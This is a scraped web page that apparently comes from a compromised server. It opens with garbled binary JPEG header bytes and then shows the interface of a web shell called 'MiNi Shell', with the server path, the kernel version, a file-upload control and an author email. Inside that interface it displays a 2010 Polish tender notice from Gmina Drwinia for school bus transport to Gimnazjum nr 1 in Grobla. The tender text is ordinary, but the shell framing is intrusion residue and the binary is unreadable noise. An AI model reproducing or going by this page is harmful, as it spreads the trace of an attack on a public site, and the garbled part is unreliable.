JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100806/241098-N-2010.html

<p class="kh_header"><b>Drwinia: Dowóz młodzieży szkolnej z terenu Gminy Drwinia do Gimnazjum nr 1 w Grobli.</b><br>
<b>Numer ogłoszenia: 241098 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Drwini , Drwinia 57, 32-709 Drwinia, woj. małopolskie, tel. 012 2817 153, 154, faks 012 2817 373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drwinia.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz młodzieży szkolnej z terenu Gminy Drwinia do Gimnazjum nr 1 w Grobli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia  obejmuje : wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2010/2011
2.	Nomenklatura niniejszego zamówienia:

CPV - 60100000-9 usługi w zakresie transportu drogowego
CPV - 60130000-8 usługi w zakresie specjalistycznego transportu drogowego osób

3.	Zamawiający dopuszcza składania ofert częściowych, gdzie część (usługi) stanowi :
Zadanie nr 1
Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2010/2011-Duży przewóz (dowóz do szkoły i odwóz ze  szkoły).
Zamawiający szacuje, że łącznie dziennie do Gimnazjum i Szkoły Podstawowej w Grobli dowożonych może być ok. 62 uczniów.
Pojazdy powinny posiadać co najmniej 53 miejsca  ( 62 uczniów będzie dojeżdżać do Gimnazjum i Szkoły Podstawowej w Grobli) muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowego.
Usługa będzie wykonywana raz dziennie tzn. będzie to dowóz uczniów do szkoły i odwiezienie ich po lekcjach (5 razy w tygodniu).
Długość trasy dowożenia uczniów wynosi ok. 42,2 km.
Trasa dowożenia kształtuje się następująco : Niedary-Świniary-Grobla-Ispina-Grobla
Zamawiający szacuje, ze w ciągu roku szkolnego 2010/2011 na w/w trasie świadczonych będzie ok. 7 850 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny dowozu i odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających dowóz lub odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt.
Zamawiający nie dopuszcza składania ofert wariantowych.

Zadanie nr 2
Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2010/2011-Mały  przewóz (odwóz ze szkoły).
Zamawiający szacuje, że łącznie dziennie z Gimnazjum i Szkoły Podstawowej w Grobli odwożonych będzie ok. 62 uczniów
Pojazdy powinny posiadać co najmniej 53 miejsca  muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowego.
Usługa będzie wykonywana raz dziennie tzn. będzie to odwóz uczniów ze szkoły.
Długość trasy odwożenia uczniów wynosi ok. 20,2 km. Ilość kursów małego przewozu będzie 3 w tygodniu.
Trasa odwożenia kształtuje się następująco : Świniary-Niedary-Świniary i Grobla-Ispina-Grobla.
Zamawiający szacuje, ze w ciągu roku szkolnego 2010/2011 na w/w trasie świadczonych będzie ok. 3 758 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny  odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających  odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt.
Zamawiający nie dopuszcza składania ofert wariantowych.

4.	Wykonawca może złożyć ofertę na całość zamówienia lub na opisaną część. Części nie mogą być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.

5.	Liczba dni nauki w roku szkolnym 2010/2011 przyjęta przez Ministerstwo Edukacji Narodowej wynosi 186 dni od dnia 01.09.2010r. do 24.06.2011r.

6.Osobę do pilnowania  młodzieży podczas przejazdu zapewni Dyrektor szkoły.

7.Zamawiający wymaga aby autobus którymi świadczona będzie usługa transportu dzieci  był w pełni sprawny techniczne. Wykonawca w tym zakresie zobowiązany jest do przestrzegania przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002r.  w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. Nr 32 z 2003 r, poz. 262)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W trakcie realizacji przedmiotu zamówienia Zamawiający może udzielić zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt.6 ustawy - Prawo zamówień publicznych.  
Zamówienia ta mogą polegać na : zleceniu dodatkowych usług transportu - tj. dodatkowych kursów czy wydłużeniu przyjętych tras. Dodatkowe usługi-zamówienia uzupełniające mogą wynikać np. :z trudnych warunków atmosferycznych, trwających remontów dróg, które wymuszają konieczność wykonania objazdów. Podstawą zlecenia usług uzupełniających może być również zmiana organizacyjna w Gimnazjum np. zmiana planu lekcji. Zamawiający przewiduje możliwość zlecenia usług uzupełniających w wysokości nie przekraczającej 20 % wartości zamówienia podstawowego.
Ewentualna realizacja zamówień uzupełniających wiąże się z podpisaniem odrębnej umowy po przeprowadzonych negocjacjach w trybie zamówienia z wolnej ręki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada aktualną licencje na wykonywanie transportu drogowego osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje doświadczeniem zawodowym rozumianym jako wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia, z podaniem ich rodzaju i wartości oraz daty i miejsca wykonania, a także załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie - wykonali co najmniej jedną usługę polegającą na dowozie uczniów do szkoły przez co najmniej 1 rok szkolny o wartości odpowiadającej przedmiotowi zamówienia (liczonej jako iloczyn ceny oferty i szacowanej ilości wozokilometrów do wykonania w ciągu całego roku szkolnego podanej w niniejszej specyfikacji)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje potencjałem technicznym niezbędnym do wykonania przedmiotowego zamówienia w tym minimum : dysponują 1 autobusem o ilości miejsc min. 53 na zadanie 1 i 2 wraz z informacją o podstawie dysponowania tymi zasobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika podmiotów występujących wspólnie (konsorcja, spółki cywilne) zgodnie z obowiązkiem wynikającym z art.23 ust.1 i 2 ustawy lub w imieniu wykonawcy (jeżeli ofertę i załączone do niej dokumenty podpisują osoby nieujawnione w rejestrze lub ewidencji do oferty należy dołączyć stosowne pełnomocnictwo udzielone przez osobę/osoby ujawnioną w rejestrze lub ewidencji), pełnomocnictwo musi zawierać stwierdzenie, ze upełnomocnieni są uprawnieni do zaciągania zobowiązań w imieniu Wykonawcy lub podmiotów występujących wspólnie.
2. Wypełniony formularz oferty (cenowy), który podajemy w zał. nr 1 do SIWZ
3. Zaparafowany przez Wykonawcę projekt umowy, który podajemy w zał. nr 2 do SIWZ
4. Aktualne dokumenty świadczące o przeprowadzonych badaniach technicznych pojazdu potwierdzającego dopuszczenie go do ruchu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy muszą być zgodne z art. 144 ustawy Prawo zamówień publicznych. Zamawiający przewiduje, że w ramach umowy można zmienić :
-   zmiany obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
- w związku ze zmianą planów lekcji zmianą organizacji działania szkół lub zmianą ilości uczniów,
- wystąpienia konieczności zmiany tras w związku np. z remontami dróg, zimowymi warunkami innymi warunkami powodującymi nieprzejezdność dróg,
- zaistnienia okoliczności leżących po stronie Zamawiającego w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zwarcia umowy,
- powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drwinia.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Drwini 57,32-709 Drwinia/I-piętro w pok. nr 15. Koszt dok. w wersji papierowej 13,50 zł Zam. może przek. tą siwz pocztą za pot. od.Dok. można pob. ze stron www.drwinia.gmina.pl.-bezpł...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2010 godzina 10:00, miejsce: Urząd Gminy w Drwini 57, 32 - 709 Drwinia/sekretariat, pok. nr 20 - II piętro.Dopuszczone jest również składanie ofert drogą pocztową lub za pomocą firmy kurierskiej..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2010/2011-Duży przewóz (dowóz do szkoły i odwóz ze  szkoły)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający szacuje, że łącznie dziennie do Gimnazjum i Szkoły Podstawowej w Grobli dowożonych może być ok. 62 uczniów.
Pojazdy powinny posiadać co najmniej 53 miejsca  ( 62 uczniów będzie dojeżdżać do Gimnazjum i Szkoły Podstawowej w Grobli) muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowego.
Usługa będzie wykonywana raz dziennie tzn. będzie to dowóz uczniów do szkoły i odwiezienie ich po lekcjach (5 razy w tygodniu).
Długość trasy dowożenia uczniów wynosi ok. 42,2 km.
Trasa dowożenia kształtuje się następująco : Niedary-Świniary-Grobla-Ispina-Grobla
Zamawiający szacuje, ze w ciągu roku szkolnego 2010/2011 na w/w trasie świadczonych będzie ok. 7 850 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny dowozu i odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających dowóz lub odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2010/2011-Mały  przewóz (odwóz ze szkoły)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający szacuje, że łącznie dziennie z Gimnazjum i Szkoły Podstawowej w Grobli odwożonych będzie ok. 62 uczniów
Pojazdy powinny posiadać co najmniej 53 miejsca  muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowego.
Usługa będzie wykonywana raz dziennie tzn. będzie to odwóz uczniów ze szkoły.
Długość trasy odwożenia uczniów wynosi ok. 20,2 km. Ilość kursów małego przewozu będzie 3 w tygodniu.
Trasa odwożenia kształtuje się następująco : Świniary-Niedary-Świniary i Grobla-Ispina-Grobla.
Zamawiający szacuje, ze w ciągu roku szkolnego 2010/2011 na w/w trasie świadczonych będzie ok. 3 758 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny  odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających  odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com